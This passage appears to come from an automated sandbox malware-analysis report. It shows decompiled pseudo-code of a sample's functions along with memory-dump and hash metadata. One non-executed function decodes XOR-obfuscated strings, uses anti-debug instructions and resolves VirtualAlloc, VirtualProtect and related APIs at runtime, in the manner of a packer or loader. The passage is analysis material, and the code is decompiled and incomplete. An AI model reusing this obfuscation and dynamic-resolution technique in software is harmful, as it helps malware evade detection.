                                                                                                                                                                                                                                  • Part of subcall function 00A8ABE6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A8AC5F
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionHelper2@8LoadRaise___delay
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 123106877-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A8AA70() {
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				E00A8ABE6(0xa8c2c4, 0xa8d0f8); // executed
                                                                                                                                                                                                                                				goto __eax;
                                                                                                                                                                                                                                			}



                                                                                                                                                                                                                                0x00a8aa3f
                                                                                                                                                                                                                                0x00a8aa46

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00A8AA3F
                                                                                                                                                                                                                                  • Part of subcall function 00A8ABE6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A8AC5F
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionHelper2@8LoadRaise___delay
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 123106877-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A8AA48() {
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				E00A8ABE6(0xa8c2c4, 0xa8d108); // executed
                                                                                                                                                                                                                                				goto __eax;
                                                                                                                                                                                                                                			}



                                                                                                                                                                                                                                0x00a8aa3f
                                                                                                                                                                                                                                0x00a8aa46

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00A8AA3F
                                                                                                                                                                                                                                  • Part of subcall function 00A8ABE6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A8AC5F
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionHelper2@8LoadRaise___delay
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 123106877-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A8AA5C() {
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				E00A8ABE6(0xa8c2c4, 0xa8d100); // executed
                                                                                                                                                                                                                                				goto __eax;
                                                                                                                                                                                                                                			}



                                                                                                                                                                                                                                0x00a8aa3f
                                                                                                                                                                                                                                0x00a8aa46

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00A8AA3F
                                                                                                                                                                                                                                  • Part of subcall function 00A8ABE6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A8AC5F
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionHelper2@8LoadRaise___delay
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 123106877-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A8AA52() {
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				E00A8ABE6(0xa8c2c4, 0xa8d104); // executed
                                                                                                                                                                                                                                				goto __eax;
                                                                                                                                                                                                                                			}




                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00A8AA3F
                                                                                                                                                                                                                                  • Part of subcall function 00A8ABE6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A8AC5F
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionHelper2@8LoadRaise___delay
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 123106877-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A8AB22() {
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				E00A8ABE6(0xa8c344, 0xa8d134); // executed
                                                                                                                                                                                                                                				goto __eax;
                                                                                                                                                                                                                                			}




                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00A8AB19
                                                                                                                                                                                                                                  • Part of subcall function 00A8ABE6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A8AC5F
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionHelper2@8LoadRaise___delay
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 123106877-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A8AB07() {
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				E00A8ABE6(0xa8c344, 0xa8d124); // executed
                                                                                                                                                                                                                                				goto __eax;
                                                                                                                                                                                                                                			}




                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00A8AB19
                                                                                                                                                                                                                                  • Part of subcall function 00A8ABE6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A8AC5F
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionHelper2@8LoadRaise___delay
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 123106877-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A85157(long _a4) {
                                                                                                                                                                                                                                				void* _t2;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t2 = RtlAllocateHeap( *0xa8d270, 0, _a4); // executed
                                                                                                                                                                                                                                				return _t2;
                                                                                                                                                                                                                                			}





                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,00000000,00A81259), ref: 00A85163
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                                • Opcode ID: 92728a643f62c94dde93264c6dbdbb2a7b1ea0690963e63db71b05eb9ee9ac78
                                                                                                                                                                                                                                • Instruction ID: 8ccf1c8a2c3244c91eebf8ec42bb669f6a8f3c078b4e0da1d06fa95bcf7823f4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 92728a643f62c94dde93264c6dbdbb2a7b1ea0690963e63db71b05eb9ee9ac78
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 32B012B1400100FBCE11CB90DE08F057B71B750710F014011B205400B0C2314426FF14
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                                C-Code - Quality: 96%
                                                                                                                                                                                                                                			E736D489D(void* __edi, void* __eflags, char _a5, char _a9, intOrPtr _a13, intOrPtr _a17, char _a21, char _a25, intOrPtr _a29, intOrPtr _a33, char _a37, char _a41, intOrPtr _a45, intOrPtr _a49, char _a53, char _a57, intOrPtr _a61, intOrPtr _a65, char _a69, char _a73, intOrPtr _a77, intOrPtr _a81, char _a85, char _a89, char _a109, char _a125, char _a129, intOrPtr _a133, intOrPtr _a137, intOrPtr _a141, char _a145, char _a149, intOrPtr _a153, intOrPtr _a157, intOrPtr _a161, char _a165, char _a169, intOrPtr _a173, intOrPtr _a177, intOrPtr _a181, char _a185, char _a189, intOrPtr _a193, intOrPtr _a197, intOrPtr _a201, char _a205, char _a209, intOrPtr _a213, intOrPtr _a217, intOrPtr _a221, char _a225, char _a229, intOrPtr _a233, intOrPtr _a237, intOrPtr _a241, char _a245, char _a249, intOrPtr _a253, intOrPtr _a257, intOrPtr _a261, char _a265, char _a269, intOrPtr _a273, intOrPtr _a277, intOrPtr _a281, char _a285, char _a289, intOrPtr _a293, intOrPtr _a297, intOrPtr _a301, char _a305, char _a309, intOrPtr _a313, intOrPtr _a317, intOrPtr _a321, char _a325, char _a329, intOrPtr _a333, intOrPtr _a337, intOrPtr _a341, char _a345, char _a349, intOrPtr _a353, intOrPtr _a357, intOrPtr _a361, char _a365, char _a369, intOrPtr _a373, intOrPtr _a377, intOrPtr _a381, char _a385, char _a389, intOrPtr _a393, intOrPtr _a397, intOrPtr _a401, char _a405, char _a409, intOrPtr _a413, intOrPtr _a417, intOrPtr _a421, char _a425, char _a429, intOrPtr _a433, intOrPtr _a437, intOrPtr _a441, char _a445, char _a449, intOrPtr _a453, intOrPtr _a457, intOrPtr _a461, char _a465, char _a469, intOrPtr _a473, intOrPtr _a477, intOrPtr _a481, char _a485, char _a489, intOrPtr _a493, intOrPtr _a497, intOrPtr _a501, char _a505, char _a509, intOrPtr _a513, intOrPtr _a517, intOrPtr _a521, 
char _a525, char _a529, intOrPtr _a533, intOrPtr _a537, intOrPtr _a541, intOrPtr _a545, char _a549, char _a553, intOrPtr _a557, intOrPtr _a561, intOrPtr _a565, intOrPtr _a569, char _a573, char _a577, intOrPtr _a581, intOrPtr _a585, intOrPtr _a589, intOrPtr _a593, intOrPtr _a597) {
                                                                                                                                                                                                                                				char _v1;
                                                                                                                                                                                                                                				intOrPtr _v484;
                                                                                                                                                                                                                                				intOrPtr _v488;
                                                                                                                                                                                                                                				intOrPtr _v492;
                                                                                                                                                                                                                                				intOrPtr _v496;
                                                                                                                                                                                                                                				char _v500;
                                                                                                                                                                                                                                				intOrPtr _v504;
                                                                                                                                                                                                                                				intOrPtr _v508;
                                                                                                                                                                                                                                				intOrPtr _v512;
                                                                                                                                                                                                                                				intOrPtr _v516;
                                                                                                                                                                                                                                				char _v520;
                                                                                                                                                                                                                                				char* _t514;
                                                                                                                                                                                                                                				char* _t515;
                                                                                                                                                                                                                                				char* _t519;
                                                                                                                                                                                                                                				char* _t520;
                                                                                                                                                                                                                                				char* _t524;
                                                                                                                                                                                                                                				char* _t525;
                                                                                                                                                                                                                                				char* _t529;
                                                                                                                                                                                                                                				char* _t530;
                                                                                                                                                                                                                                				char* _t534;
                                                                                                                                                                                                                                				char* _t535;
                                                                                                                                                                                                                                				char* _t539;
                                                                                                                                                                                                                                				char* _t540;
                                                                                                                                                                                                                                				char* _t544;
                                                                                                                                                                                                                                				char* _t545;
                                                                                                                                                                                                                                				char* _t549;
                                                                                                                                                                                                                                				char* _t550;
                                                                                                                                                                                                                                				char* _t554;
                                                                                                                                                                                                                                				char* _t555;
                                                                                                                                                                                                                                				char* _t559;
                                                                                                                                                                                                                                				char* _t560;
                                                                                                                                                                                                                                				char* _t564;
                                                                                                                                                                                                                                				char* _t565;
                                                                                                                                                                                                                                				char* _t569;
                                                                                                                                                                                                                                				char* _t570;
                                                                                                                                                                                                                                				char* _t574;
                                                                                                                                                                                                                                				char* _t575;
                                                                                                                                                                                                                                				char* _t579;
                                                                                                                                                                                                                                				char* _t580;
                                                                                                                                                                                                                                				char* _t584;
                                                                                                                                                                                                                                				char* _t585;
                                                                                                                                                                                                                                				void* _t705;
                                                                                                                                                                                                                                				void* _t707;
                                                                                                                                                                                                                                				void* _t709;
                                                                                                                                                                                                                                				void* _t711;
                                                                                                                                                                                                                                				void* _t713;
                                                                                                                                                                                                                                				void* _t715;
                                                                                                                                                                                                                                				void* _t717;
                                                                                                                                                                                                                                				void* _t719;
                                                                                                                                                                                                                                				void* _t721;
                                                                                                                                                                                                                                				void* _t723;
                                                                                                                                                                                                                                				void* _t725;
                                                                                                                                                                                                                                				void* _t727;
                                                                                                                                                                                                                                				void* _t729;
                                                                                                                                                                                                                                				void* _t731;
                                                                                                                                                                                                                                				void* _t733;
                                                                                                                                                                                                                                				void* _t735;
                                                                                                                                                                                                                                				void* _t737;
                                                                                                                                                                                                                                				void* _t739;
                                                                                                                                                                                                                                				void* _t741;
                                                                                                                                                                                                                                				void* _t743;
                                                                                                                                                                                                                                				void* _t745;
                                                                                                                                                                                                                                				void* _t747;
                                                                                                                                                                                                                                				void* _t749;
                                                                                                                                                                                                                                				void* _t751;
                                                                                                                                                                                                                                				void* _t753;
                                                                                                                                                                                                                                				void* _t755;
                                                                                                                                                                                                                                				void* _t757;
                                                                                                                                                                                                                                				void* _t759;
                                                                                                                                                                                                                                				void* _t761;
                                                                                                                                                                                                                                				void* _t763;
                                                                                                                                                                                                                                				signed int _t765;
                                                                                                                                                                                                                                				signed int _t766;
                                                                                                                                                                                                                                				signed int _t767;
                                                                                                                                                                                                                                				signed int _t768;
                                                                                                                                                                                                                                				signed int _t769;
                                                                                                                                                                                                                                				signed int _t770;
                                                                                                                                                                                                                                				signed int _t771;
                                                                                                                                                                                                                                				signed int _t772;
                                                                                                                                                                                                                                				signed int _t773;
                                                                                                                                                                                                                                				signed int _t774;
                                                                                                                                                                                                                                				signed int _t775;
                                                                                                                                                                                                                                				signed int _t776;
                                                                                                                                                                                                                                				signed int _t777;
                                                                                                                                                                                                                                				signed int _t778;
                                                                                                                                                                                                                                				signed int _t779;
                                                                                                                                                                                                                                				signed int _t780;
                                                                                                                                                                                                                                				signed int _t781;
                                                                                                                                                                                                                                				signed int _t782;
                                                                                                                                                                                                                                				signed int _t783;
                                                                                                                                                                                                                                				signed int _t784;
                                                                                                                                                                                                                                				signed int _t785;
                                                                                                                                                                                                                                				signed int _t786;
                                                                                                                                                                                                                                				signed int _t787;
                                                                                                                                                                                                                                				signed int _t788;
                                                                                                                                                                                                                                				signed int _t789;
                                                                                                                                                                                                                                				signed int _t790;
                                                                                                                                                                                                                                				signed int _t791;
                                                                                                                                                                                                                                				signed int _t792;
                                                                                                                                                                                                                                				signed int _t793;
                                                                                                                                                                                                                                				signed int _t794;
                                                                                                                                                                                                                                				void* _t796;
                                                                                                                                                                                                                                				signed int _t800;
                                                                                                                                                                                                                                				void* _t801;
                                                                                                                                                                                                                                				void* _t802;
                                                                                                                                                                                                                                				void* _t803;
                                                                                                                                                                                                                                				void* _t804;
                                                                                                                                                                                                                                				void* _t805;
                                                                                                                                                                                                                                				void* _t806;
                                                                                                                                                                                                                                				void* _t807;
                                                                                                                                                                                                                                				void* _t808;
                                                                                                                                                                                                                                				void* _t809;
                                                                                                                                                                                                                                				void* _t810;
                                                                                                                                                                                                                                				void* _t811;
                                                                                                                                                                                                                                				void* _t812;
                                                                                                                                                                                                                                				void* _t813;
                                                                                                                                                                                                                                				void* _t814;
                                                                                                                                                                                                                                				void* _t815;
                                                                                                                                                                                                                                				void* _t816;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t796 = __edi;
                                                                                                                                                                                                                                				asm("int1");
                                                                                                                                                                                                                                				if(__eflags > 0) {
                                                                                                                                                                                                                                					asm("in eax, 0x5e");
                                                                                                                                                                                                                                					asm("int3");
                                                                                                                                                                                                                                					asm("int3");
                                                                                                                                                                                                                                					asm("int3");
                                                                                                                                                                                                                                					asm("int3");
                                                                                                                                                                                                                                					asm("int3");
                                                                                                                                                                                                                                					asm("int3");
                                                                                                                                                                                                                                					_push( &_v1);
                                                                                                                                                                                                                                					_t800 = (_t800 & 0xfffffff8) - 0x258;
                                                                                                                                                                                                                                					_v500 = 0;
                                                                                                                                                                                                                                					_v496 = 0x442c1809;
                                                                                                                                                                                                                                					_v492 = 0x384d1107;
                                                                                                                                                                                                                                					_v488 = 0x6612396c;
                                                                                                                                                                                                                                					_v484 = 0xa7e5d42;
                                                                                                                                                                                                                                					if(_v500 == 0) {
                                                                                                                                                                                                                                						_t794 = 0;
                                                                                                                                                                                                                                						do {
                                                                                                                                                                                                                                							 *(_t800 + 0x6c + _t794 * 4) =  *(_t800 + 0x6c + _t794 * 4) ^ 0x0a7e5d42;
                                                                                                                                                                                                                                							_t794 = _t794 + 1;
                                                                                                                                                                                                                                						} while (_t794 < 4);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_v520 = 0;
                                                                                                                                                                                                                                					_v516 = 0x55905f81;
                                                                                                                                                                                                                                					_v512 = 0x608e57a2;
                                                                                                                                                                                                                                					_v508 = 0x428d5abb;
                                                                                                                                                                                                                                					_v504 = 0x21e236d7;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t801 = _t800 + 1;
                                                                                                                                                                                                                                				asm("xlatb");
                                                                                                                                                                                                                                				asm("loop 0x24");
                                                                                                                                                                                                                                				if(_a85 == 0) {
                                                                                                                                                                                                                                					_t793 = 0;
                                                                                                                                                                                                                                					asm("o16 nop [eax+eax]");
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						 *(_t801 + 0x58 + _t793 * 4) =  *(_t801 + 0x58 + _t793 * 4) ^ 0x21e236d7;
                                                                                                                                                                                                                                						_t793 = _t793 + 1;
                                                                                                                                                                                                                                					} while (_t793 < 4);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				E736D7DE0(_t796, "VirtualAlloc", 0, 0x200);
                                                                                                                                                                                                                                				_t705 = 0;
                                                                                                                                                                                                                                				 *0x736efd48 = 0;
                                                                                                                                                                                                                                				_t802 = _t801 + 0xc;
                                                                                                                                                                                                                                				_t514 =  &_a89;
                                                                                                                                                                                                                                				if(_a89 != 0) {
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						_t514 = _t514 + 1;
                                                                                                                                                                                                                                						_t705 = _t705 + 1;
                                                                                                                                                                                                                                					} while ( *_t514 != 0);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t706 = _t705 + 1;
                                                                                                                                                                                                                                				if(_t705 + 1 != 0) {
                                                                                                                                                                                                                                					E736D82C0("VirtualAlloc",  &_a89, _t706);
                                                                                                                                                                                                                                					_t802 = _t802 + 0xc;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t707 = 0;
                                                                                                                                                                                                                                				_t515 =  &_a109;
                                                                                                                                                                                                                                				if(_a109 != 0) {
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						_t515 = _t515 + 1;
                                                                                                                                                                                                                                						_t707 = _t707 + 1;
                                                                                                                                                                                                                                					} while ( *_t515 != 0);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t708 = _t707 + 1;
                                                                                                                                                                                                                                				if(_t707 + 1 != 0) {
                                                                                                                                                                                                                                					E736D82C0("KERNEL32.dll",  &_a109, _t708);
                                                                                                                                                                                                                                					_t802 = _t802 + 0xc;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_a145 = 0;
                                                                                                                                                                                                                                				_a149 = 0x59114582;
                                                                                                                                                                                                                                				_a153 = 0x25704c8c;
                                                                                                                                                                                                                                				_a157 = 0x7b2f64e7;
                                                                                                                                                                                                                                				_a161 = 0x174300c9;
                                                                                                                                                                                                                                				if(_a145 == 0) {
                                                                                                                                                                                                                                					_t792 = 0;
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						 *(_t802 + 0x94 + _t792 * 4) =  *(_t802 + 0x94 + _t792 * 4) ^ 0x174300c9;
                                                                                                                                                                                                                                						_t792 = _t792 + 1;
                                                                                                                                                                                                                                					} while (_t792 < 4);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_a125 = 0;
                                                                                                                                                                                                                                				_a129 = 0x1a6ef159;
                                                                                                                                                                                                                                				_a133 = 0x3e70f97a;
                                                                                                                                                                                                                                				_a137 = 0xb68f77d;
                                                                                                                                                                                                                                				_a141 = 0x6e1cec6c;
                                                                                                                                                                                                                                				if(_a125 == 0) {
                                                                                                                                                                                                                                					_t791 = 0;
                                                                                                                                                                                                                                					asm("o16 nop [eax+eax]");
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						 *(_t802 + 0x80 + _t791 * 4) =  *(_t802 + 0x80 + _t791 * 4) ^ 0x6e1c980f;
                                                                                                                                                                                                                                						_t791 = _t791 + 1;
                                                                                                                                                                                                                                					} while (_t791 < 4);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				E736D7DE0(_t796, "VirtualProtect", 0, 0x200);
                                                                                                                                                                                                                                				_t709 = 0;
                                                                                                                                                                                                                                				 *0x736eff4c = 0;
                                                                                                                                                                                                                                				_t803 = _t802 + 0xc;
                                                                                                                                                                                                                                				_t519 =  &_a129;
                                                                                                                                                                                                                                				if(_a129 != 0) {
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						_t519 = _t519 + 1;
                                                                                                                                                                                                                                						_t709 = _t709 + 1;
                                                                                                                                                                                                                                					} while ( *_t519 != 0);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t710 = _t709 + 1;
                                                                                                                                                                                                                                				if(_t709 + 1 != 0) {
                                                                                                                                                                                                                                					E736D82C0("VirtualProtect",  &_a129, _t710);
                                                                                                                                                                                                                                					_t803 = _t803 + 0xc;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t711 = 0;
                                                                                                                                                                                                                                				_t520 =  &_a149;
                                                                                                                                                                                                                                				if(_a149 != 0) {
                                                                                                                                                                                                                                					do {
						_t520 = _t520 + 1;
						_t711 = _t711 + 1;
					} while ( *_t520 != 0);
				}
				_t712 = _t711 + 1;
				if(_t711 + 1 != 0) {
					E736D82C0("KERNEL32.dll",  &_a149, _t712);
					_t803 = _t803 + 0xc;
				}
				_a185 = 0;
				_a189 = 0x2150272;
				_a193 = 0x7e740b7c;
				_a197 = 0x202b2317;
				_a201 = 0x4c474739;
				if(_a185 == 0) {
					_t790 = 0;
					do {
						 *(_t803 + 0xbc + _t790 * 4) =  *(_t803 + 0xbc + _t790 * 4) ^ 0x4c474739;
						_t790 = _t790 + 1;
					} while (_t790 < 4);
				}
				_a165 = 0;
				_a169 = 0x5b9ae549;
				_a173 = 0x7e84ed6a;
				_a177 = 0x569ae96a;
				_a181 = 0x2fe88c1f;
				if(_a165 == 0) {
					_t789 = 0;
					do {
						 *(_t803 + 0xa8 + _t789 * 4) =  *(_t803 + 0xa8 + _t789 * 4) ^ 0x2fe88c1f;
						_t789 = _t789 + 1;
					} while (_t789 < 4);
				}
				E736D7DE0(_t796, "VirtualQuery", 0, 0x200);
				_t713 = 0;
				 *0x736f0150 = 0;
				_t804 = _t803 + 0xc;
				_t524 =  &_a169;
				if(_a169 != 0) {
					asm("o16 nop [eax+eax]");
					do {
						_t524 = _t524 + 1;
						_t713 = _t713 + 1;
					} while ( *_t524 != 0);
				}
				_t714 = _t713 + 1;
				if(_t713 + 1 != 0) {
					E736D82C0("VirtualQuery",  &_a169, _t714);
					_t804 = _t804 + 0xc;
				}
				_t715 = 0;
				_t525 =  &_a189;
				if(_a189 != 0) {
					do {
						_t525 = _t525 + 1;
						_t715 = _t715 + 1;
					} while ( *_t525 != 0);
				}
				_t716 = _t715 + 1;
				if(_t715 + 1 != 0) {
					E736D82C0("KERNEL32.dll",  &_a189, _t716);
					_t804 = _t804 + 0xc;
				}
				_a205 = 0;
				_a209 = 0x40b17d1a;
				_a213 = 0x3cd07414;
				_a217 = 0x628f5c7f;
				_a221 = 0xee33851;
				if(_a205 == 0) {
					_t788 = 0;
					do {
						 *(_t804 + 0xd0 + _t788 * 4) =  *(_t804 + 0xd0 + _t788 * 4) ^ 0x0ee33851;
						_t788 = _t788 + 1;
					} while (_t788 < 4);
				}
				_a5 = 0;
				_a9 = 0x2fe68666;
				_a13 = 0x1df88e45;
				_a17 = 0x5bf18a42;
				if(_a5 == 0) {
					_t787 = 0;
					do {
						 *(_t804 + 8 + _t787 * 4) =  *(_t804 + 8 + _t787 * 4) ^ 0x5b94ef30;
						_t787 = _t787 + 1;
					} while (_t787 < 3);
				}
				E736D7DE0(_t796, "VirtualFree", 0, 0x200);
				_t717 = 0;
				 *0x736f0354 = 0;
				_t805 = _t804 + 0xc;
				_t529 =  &_a9;
				if(_a9 != 0) {
					do {
						_t529 = _t529 + 1;
						_t717 = _t717 + 1;
					} while ( *_t529 != 0);
				}
				_t718 = _t717 + 1;
				if(_t717 + 1 != 0) {
					E736D82C0("VirtualFree",  &_a9, _t718);
					_t805 = _t805 + 0xc;
				}
				_t719 = 0;
				_t530 =  &_a209;
				if(_a209 != 0) {
					do {
						_t530 = _t530 + 1;
						_t719 = _t719 + 1;
					} while ( *_t530 != 0);
				}
				_t720 = _t719 + 1;
				if(_t719 + 1 != 0) {
